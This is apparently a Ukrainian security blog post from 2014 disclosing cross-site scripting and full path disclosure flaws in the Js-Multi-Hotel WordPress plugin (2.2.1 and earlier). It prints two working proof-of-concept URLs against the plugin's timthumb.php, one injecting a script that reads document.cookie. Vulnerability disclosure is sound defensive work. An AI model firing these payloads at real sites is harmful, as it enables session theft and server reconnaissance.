XSS і FPD уразливості в Js-Multi-Hotel для WordPress
22:43 28.03.2014У березні, 21.03.2014, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Js-Multi-Hotel для WordPress. Про що найближчим часом повідомлю розробникам.
Стосовно плагінів для WordPress раніше я писав про уразливості в VideoWhisper Live Streaming Integration для WordPress.
Я знайшов численні уразливості в цьому плагіні. Ось XSS та FPD уразливості, а з часом оприлюдню інші дірки.
Cross-Site Scripting (WASC-08):
http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure (WASC-13):
http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://
Уразливі Js-Multi-Hotel 2.2.1 та попередні версії.